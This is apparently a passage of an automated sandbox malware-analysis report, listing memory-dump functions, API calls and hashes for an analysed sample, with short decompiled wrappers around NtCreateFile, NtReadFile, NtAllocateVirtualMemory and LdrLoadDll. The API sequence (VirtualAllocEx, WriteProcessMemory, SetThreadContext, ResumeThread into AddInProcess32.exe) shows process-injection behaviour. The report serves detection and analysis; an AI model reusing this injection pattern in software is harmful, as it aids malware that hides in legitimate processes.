Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 006BB533

Memory Dump Source

Source File: 00000004.00000002.2108813317.00000000006B0000.00000040.00000001.sdmp, Offset: 006B0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: c56622f19cbc5227398084495ba43f01ec7e77f603d417f9aca3396534418d4e
Instruction ID: c631355b438390a1d17a0f37ba7637dc44678e70f63a68e40f4b31d719a587bd
Opcode Fuzzy Hash: c56622f19cbc5227398084495ba43f01ec7e77f603d417f9aca3396534418d4e
Instruction Fuzzy Hash: 5741B9B5D012589FCF10CFA9D884AEEFBF1BB49314F20942AE819B7200D774AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 006BAD70, Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 006BAE1A

Memory Dump Source

Source File: 00000004.00000002.2108813317.00000000006B0000.00000040.00000001.sdmp, Offset: 006B0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2be6d6dfe7487053ab8229dc18c5de93b86db0073ebc1af8d3b116773822493c
Instruction ID: ee430139a81b197d7215a9511be3f43aa3fb68fe066d1946e870eec83972f7b0
Opcode Fuzzy Hash: 2be6d6dfe7487053ab8229dc18c5de93b86db0073ebc1af8d3b116773822493c
Instruction Fuzzy Hash: 8E3187B8D002589FCF10CFA9D884ADEFBB5BB49314F10A42AE815B7310D775A946CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00254C18, Relevance: 1.6, APIs: 1, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 00255BFF

Memory Dump Source

Source File: 00000004.00000002.2108487372.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 3e44ce8eb522828a97880c6d75e5b82c2e4daf445441b7849371c82fa64dce38
Instruction ID: a82c893c405ab0a1275f2b27e486b4b99d8aaac87c86a587823b4175ee103772
Opcode Fuzzy Hash: 3e44ce8eb522828a97880c6d75e5b82c2e4daf445441b7849371c82fa64dce38
Instruction Fuzzy Hash: 1931A8B9D042589FCB10CFA9D884AEEFBB0AB19311F24902AE814B7310D374A954CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00259C50, Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 00259CFF

Memory Dump Source

Source File: 00000004.00000002.2108487372.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: fac89a247f22391958192f4ecd58911017c1f86078cbf23ca21646d20e060a28
Instruction ID: 453565eb038afc95a3e6fc37918b21283ab717c9606688b482c7a15d56196827
Opcode Fuzzy Hash: fac89a247f22391958192f4ecd58911017c1f86078cbf23ca21646d20e060a28
Instruction Fuzzy Hash: E13189B9D00258DFCB10CFA9D584ADEFBB1BB09314F24942AE814B7210D375A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00255B52, Relevance: 1.6, APIs: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 00255BFF

Memory Dump Source

Source File: 00000004.00000002.2108487372.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ea7b6046e0889ac8e8b026469ab3ea3f2fcb6749c75aadbf751a0b6e1db7880b
Instruction ID: af6fa02b436982e3ab6cb8c28298fe1869eb937ffb976d1466a44d4ebc31454d
Opcode Fuzzy Hash: ea7b6046e0889ac8e8b026469ab3ea3f2fcb6749c75aadbf751a0b6e1db7880b
Instruction Fuzzy Hash: CE3199B9D042589FCF10CFA9D984ADEFBB1BB19311F24942AE814B7320D374AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 006BB8A9, Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 006BB95F

Memory Dump Source

Source File: 00000004.00000002.2108813317.00000000006B0000.00000040.00000001.sdmp, Offset: 006B0000, based on PE: false

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 7bfe95a41ca3c56031b5dfc69125f6973955b4637db9d3e1ab48b23627ba1248
Instruction ID: 322f12502cf82e4f5c22f6afbf0e6ec5a8e6fc9607d56678efc3a722a1f74f35
Opcode Fuzzy Hash: 7bfe95a41ca3c56031b5dfc69125f6973955b4637db9d3e1ab48b23627ba1248
Instruction Fuzzy Hash: 1941BBB4D012589FCF10DFA9D884AEEBBB1BF49314F24942AE415B7310D778AA85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 006BB8B0, Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 006BB95F

Memory Dump Source

Source File: 00000004.00000002.2108813317.00000000006B0000.00000040.00000001.sdmp, Offset: 006B0000, based on PE: false

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: a7d73dfd72b4f6322a3a6b620a9940fa1a11a5439b73e15df66960cde9d75c86
Instruction ID: fe4b3d2559fbaa4600cfebb77a3dfb8e4be4a4497376641f33a0faefd40599c7
Opcode Fuzzy Hash: a7d73dfd72b4f6322a3a6b620a9940fa1a11a5439b73e15df66960cde9d75c86
Instruction Fuzzy Hash: 5231BBB4D012589FCB10CFA9D884AEEFBF5BB49314F24942AE415B7200D778A985CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00259C58, Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 00259CFF

Memory Dump Source

Source File: 00000004.00000002.2108487372.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 419a7be9e7717d409a37c0b3ac20f5aece68564aac9e0efee34ca786056adae3
Instruction ID: 9dd200af7849e89b3e2da38c5d4c555083db8abfba175a02730bf5f8896b6d4d
Opcode Fuzzy Hash: 419a7be9e7717d409a37c0b3ac20f5aece68564aac9e0efee34ca786056adae3
Instruction Fuzzy Hash: 873178B9D012589FCB10CFA9D884ADEFBB5BB19310F24942AE814B7210D775A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 002565E4, Relevance: 1.6, APIs: 1, Instructions: 86fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?), ref: 0025A461

Memory Dump Source

Source File: 00000004.00000002.2108487372.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 3a295c3819e475680a94701799e1062a9cc89e2cf6736eb2f9f6c9905a190449
Instruction ID: 402d42f4dd177e009891e69527e7427161887cd1e404a826f470a4901e88c4ca
Opcode Fuzzy Hash: 3a295c3819e475680a94701799e1062a9cc89e2cf6736eb2f9f6c9905a190449
Instruction Fuzzy Hash: 9831DBB4D112589FCB10CFA9D888AEEFBF5BF49314F14846AE804B7310D374AA45CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0025A3C0, Relevance: 1.6, APIs: 1, Instructions: 85fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?), ref: 0025A461

Memory Dump Source

Source File: 00000004.00000002.2108487372.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: aa8f85aa74cfb35407df6d3e1facd15125f103ce4d318fea98f1751b94ecdb3b
Instruction ID: a28977cfef8ab1f2712b4ebe4ddc710021a3821a1609f71f93fcca502b928aff
Opcode Fuzzy Hash: aa8f85aa74cfb35407df6d3e1facd15125f103ce4d318fea98f1751b94ecdb3b
Instruction Fuzzy Hash: 6C31EBB4D11258CFCB00CFA9D888AEEFBF1BF49314F14802AE804B7210C374AA45CB65

Uniqueness

Uniqueness Score: -1.00%

Function 006BBB08, Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32(?), ref: 006BBB86

Memory Dump Source

Source File: 00000004.00000002.2108813317.00000000006B0000.00000040.00000001.sdmp, Offset: 006B0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 704c34e88f5be6697dd8a7e05a9a0ed3442b7af7eed9905529136b34143f745b
Instruction ID: 555f46239a14cbf9d351b40e9e9579db7342c907ddc57a667c9a671af079adb0
Opcode Fuzzy Hash: 704c34e88f5be6697dd8a7e05a9a0ed3442b7af7eed9905529136b34143f745b
Instruction Fuzzy Hash: 7331A9B4D012189FCF14CFA9D884ADEFBB5AF49314F14982AE815B7300DB74A941CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0016D2B1, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2108446650.000000000016D000.00000040.00000001.sdmp, Offset: 0016D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b00021c8e3fa8c52328a7f2598fb2b695a0537e6ee080c45f1e77319b244a435
Instruction ID: 000ef06be7e37d46e2e44cfce4004b3bb30a2aea1d6c51d79a092e9773d55712
Opcode Fuzzy Hash: b00021c8e3fa8c52328a7f2598fb2b695a0537e6ee080c45f1e77319b244a435
Instruction Fuzzy Hash: BE01F271A043049AD7108A66EC88BA7BB98EF51724F18C45AED055B282C379E844D6B2

Uniqueness

Uniqueness Score: -1.00%

Function 0016D2B0, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2108446650.000000000016D000.00000040.00000001.sdmp, Offset: 0016D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d04f891d087143f1acd9028cd5b7a5015246e96c92e4a5ff767b74669843033
Instruction ID: 8f496893d88ef1506955b6827719d4f0f094b73a75b7638d9a46a9b54cf8e45b
Opcode Fuzzy Hash: 3d04f891d087143f1acd9028cd5b7a5015246e96c92e4a5ff767b74669843033
Instruction Fuzzy Hash: BFF04F719042449BEB108A55DD88B66FF98EB51734F18C55AED085B286C379AC44CBA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0025F258, Relevance: .4, Instructions: 373COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2108487372.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee7e0e68f6146a21ca9f90e82295e26cbbbc2c1b43d66574e7440ab862f4297d
Instruction ID: d361b1a6916ca82b1c22005cb80992126c5479e02629957a9c1d3c24e2939f53
Opcode Fuzzy Hash: ee7e0e68f6146a21ca9f90e82295e26cbbbc2c1b43d66574e7440ab862f4297d
Instruction Fuzzy Hash: A1021674D10228CFDB64CFA5C984BEEFBB2BF48305F1480AAD908A7295DB745A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 006B7C10, Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2108813317.00000000006B0000.00000040.00000001.sdmp, Offset: 006B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b09b4ec2e018855a02346c6fd18ebf3fc25c0a50491a7510fd14fc1f29484f86
Instruction ID: 27378e3c6e051b8f89904048206038a69417547f7a2b4ffb29a38523cc8de207
Opcode Fuzzy Hash: b09b4ec2e018855a02346c6fd18ebf3fc25c0a50491a7510fd14fc1f29484f86
Instruction Fuzzy Hash: 27E109B4E141198FCB14DF98C5809ADFBF6BF88305F248169E915AB35AD730AD82CF60

Uniqueness

Uniqueness Score: -1.00%

Function 006B68C0, Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2108813317.00000000006B0000.00000040.00000001.sdmp, Offset: 006B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34d3df6c2fbd598616c30310a2174657e422c3f85ae4e5c269189c53a672ddcc
Instruction ID: 33215b43cd070209506619296030977d4757f01475c51d3219342aca7e1cf275
Opcode Fuzzy Hash: 34d3df6c2fbd598616c30310a2174657e422c3f85ae4e5c269189c53a672ddcc
Instruction Fuzzy Hash: 55E1F8B4E101198FCB14DF98C5809ADBBB2BF89305F24C169E915A735AD734AD81CF60

Uniqueness

Uniqueness Score: -1.00%

Function 006B8890, Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2108813317.00000000006B0000.00000040.00000001.sdmp, Offset: 006B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d15a195da4a1cf8a5ae4072241e88487f65cd4a8c4df5aee4822e527bf8f1fd9
Instruction ID: c67e8e338c4d85f45ad648536a0423f52d57ddbf59f82e5374eeee3b2804c0ca
Opcode Fuzzy Hash: d15a195da4a1cf8a5ae4072241e88487f65cd4a8c4df5aee4822e527bf8f1fd9
Instruction Fuzzy Hash: F6E1F8B4E101198FCB14DFA9C5809ADFBF6BF89305F248169D915A735ADB30AD82CF60

Uniqueness

Uniqueness Score: -1.00%

Function 006BA608, Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2108813317.00000000006B0000.00000040.00000001.sdmp, Offset: 006B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fc34dfc1584138843a391c6a2de03b94a120558b28a3db5b22137d97455bd2e
Instruction ID: eeb5c7c30cb22b5207595ad04e12cbd470e4f61ae3040f1be6b1138a021b4bf4
Opcode Fuzzy Hash: 5fc34dfc1584138843a391c6a2de03b94a120558b28a3db5b22137d97455bd2e
Instruction Fuzzy Hash: 1AE1F8B4E101198FCB14DFE9C5809ADBBF6BF89305F248169D815A735ADB30AD82CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00254D60, Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2108487372.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 731eba61bf4b4c747feb2d1bd4bf94fab60cb4497a86e44fd697270e1413eec8
Instruction ID: 46f956ba65677949b0dceca7a5fa1350dac472d74d5c7a5c466995f6150188e7
Opcode Fuzzy Hash: 731eba61bf4b4c747feb2d1bd4bf94fab60cb4497a86e44fd697270e1413eec8
Instruction Fuzzy Hash: C25148316386558BC711AE689C427BAF7B1FB8131AF248627EC56C7291C378C9E8C359

Uniqueness

Uniqueness Score: -1.00%

Function 006B68B1, Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2108813317.00000000006B0000.00000040.00000001.sdmp, Offset: 006B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe1caa6a9c4a476fda6793b1b725388e8c0339b46224c4fb6b5409f6e1f55b1e
Instruction ID: 580cf2719dc51c93b58970869088a2626ec21fb22c725ab7cb88eaba437b5cc8
Opcode Fuzzy Hash: fe1caa6a9c4a476fda6793b1b725388e8c0339b46224c4fb6b5409f6e1f55b1e
Instruction Fuzzy Hash: 27510AB4E102198BDB14DFA9C9805EEFBF2AF89304F24C169D818A7356D7319D41CF61

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: AddInProcess32.exe PID: 2824 Parent PID: 1484 AddInProcess32.exeCOMMON

Executed Functions

Function 00419E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A960(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00419e13
0x00419e1f
0x00419e27
0x00419e32
0x00419e4d
0x00419e55
0x00419e59

APIs

NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55

Strings

BMA, xrefs: 00419E4D, 00419E54
BMA, xrefs: 00419E32, 00419E40

Memory Dump Source

Source File: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: BMA$BMA
API String ID: 2738559852-2163208940
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: bd248b349f18b2ced93d1e709abaf342431bbeaaaaa26160fd0c904447d41470
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 45F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1DA7241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_t24 = _a8;
				_v8 =  &_v536;
				_t15 = E0041C650( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CA70(_v8, _t24, __eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CCF0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041AEA0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x0040acd9
0x0040acec
0x0040acef
0x0040acf4
0x0040acf9
0x0040ad03
0x0040ad08
0x0040ad0b
0x0040ad0d
0x0040ad15
0x0040ad1a
0x0040ad1a
0x0040ad21
0x0040ad29
0x0040ad2c
0x0040ad2e
0x0040ad42
0x00000000
0x0040ad44
0x0040ad4a
0x0040acfe
0x0040acfe
0x0040acfe

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42

Memory Dump Source

Source File: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96

Uniqueness

Uniqueness Score: -1.00%

Function 00419D60, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419D60(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041A960(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x00419d6f
0x00419d77
0x00419dad
0x00419db1

APIs

NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD

Memory Dump Source

Source File: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419DB3, Relevance: 1.5, APIs: 1, Instructions: 35filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD

Memory Dump Source

Source File: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ae8e70f240ea659bee86a9c7dae0642191869ef75ac8ca9584688fce5cc2aa80
Instruction ID: 5e8e6141857b39c2fbf8d68c5cfc0c6a2e7e3bfd49510c9e74ed0e2b8870a125
Opcode Fuzzy Hash: ae8e70f240ea659bee86a9c7dae0642191869ef75ac8ca9584688fce5cc2aa80
Instruction Fuzzy Hash: CEF0A4B2204109AF8B08CF98D881CDB77B9AF8C714B15921DF919D7255D634E851CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419F40(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041A960(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x00419f4f
0x00419f57
0x00419f79
0x00419f7d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79

Memory Dump Source

Source File: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419E8A, Relevance: 1.5, APIs: 1, Instructions: 22
nativeCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00419E8A(void* __eax, signed int __ecx, void* __edx, void* __edi, intOrPtr _a4, void* _a8) {
				long _t12;

				asm("lodsb");
				_t19 = __edi +  *((intOrPtr*)(__eax + 0x55 + __ecx * 2));
				_t9 = _a4;
				_t5 = _t9 + 0x10; // 0x300
				_t6 = _t9 + 0xc50; // 0x40a923
				E0041A960(_t19, _a4, _t6,  *_t5, 0, 0x2c);
				_t12 = NtClose(_a8); // executed
				return _t12;
			}

0x00419e8a
0x00419e8d
0x00419e93
0x00419e96
0x00419e9f
0x00419ea7
0x00419eb5
0x00419eb9

APIs

NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5

Memory Dump Source

Source File: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: d7e6b4a6f5b599adcc158f7e932870e142a7e47feb8bd5efb3a1b4d716b2c4c6
Instruction ID: b25ad9770d97984819c4e0ce4b7040a082ae5665a9e5b32fe796fc7bcd838d7d
Opcode Fuzzy Hash: d7e6b4a6f5b599adcc158f7e932870e142a7e47feb8bd5efb3a1b4d716b2c4c6
Instruction Fuzzy Hash: 49E08675101204AFD710EF94DC85E977779EF48710F168459BE186B352C630F56487D0

Uniqueness

Uniqueness Score: -1.00%

Function 00419E90, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419E90(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041A960(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x00419e93
0x00419e96
0x00419e9f
0x00419ea7
0x00419eb5
0x00419eb9

APIs

NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5

Memory Dump Source

Source File: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: e68336ecf97fcbff1cce52d5eab911d0c0d253976a6ab71543f56f2ca0e2158f
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 6CD012752002146BD710EB99CC85ED7776CEF44760F154459BA5C5B242C530F55086E0

Uniqueness

Uniqueness Score: -1.00%

Function 008400C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008400CF

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 00840048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00840053

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A

Uniqueness

Uniqueness Score: -1.00%

Function 00840078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

